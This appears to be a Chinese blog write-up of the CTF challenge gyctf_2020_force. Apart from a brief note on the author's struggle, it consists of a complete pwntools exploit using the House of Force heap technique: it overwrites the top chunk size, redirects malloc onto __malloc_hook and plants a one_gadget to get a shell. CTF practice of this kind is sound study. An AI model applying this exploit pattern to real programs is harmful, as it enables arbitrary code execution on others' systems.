House of force 算是比较容易理解的堆利用手法,本题主要是一个裸的 HOF,但是因为各种各样的错误调了整整两个晚上才在打通,身心俱疲,有点丧失继续学 pwn 的信心了,还是记录一下
libc 是我本地带符号表的
from pwn import *
libc_path = ‘/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so‘
ld_path = ‘/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so‘
elf_path = ‘./gyctf_2020_force‘
#r = process([ld_path, elf_path], env={"LD_PRELOAD":libc_path})
r = remote(‘node3.buuoj.cn‘, ‘29681‘)
context.log_level = ‘debug‘
elf = ELF(elf_path)
libc = ELF(libc_path)
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
def add(size, content):
r.sendlineafter(‘2:puts‘, ‘1‘)
r.sendlineafter(‘size‘, str(size))
r.recvuntil(‘bin addr ‘)
addr = int(r.recvuntil(‘\n‘)[:-1], 16)
r.sendlineafter(‘content‘, content)
return addr
def show(idx):
r.sendlineafter(‘2:puts‘, ‘2‘)
def debug():
gdb.attach(r)
pause()
addr = add(1000000, ‘aaaa‘)
success(‘malloc addr -> ‘ + hex(addr))
pay = ‘a‘*0x10 + p64(0) + p64(999999999999)
libc_base = addr - 0x6fa010
realloc = libc_base + libc.symbols[‘__libc_realloc‘]
success(‘addr - >‘ + hex(realloc))
success(‘libc_base ->‘ + hex(libc_base))
pay = ‘a‘*0x10 + p64(0) + p64(0xffffffffffffffff)
top_chunk = add(0x18, pay) + 0x10
success(‘top chunk -> ‘ + hex(top_chunk))
target = libc_base + libc.symbols[‘__malloc_hook‘] - top_chunk - 0x33
pay = p64(0) + p64(libc_base + gadget[1]) + p64(realloc+0x10)
add(target, ‘a‘*0x8)
add(0x10, pay)
r.sendlineafter(‘2:puts\n‘, ‘1‘)
r.sendlineafter(‘size\n‘, str(0x40))
r.interactive()
gyctf_2020_force | House of force
原文:https://www.cnblogs.com/zhwer/p/14135734.html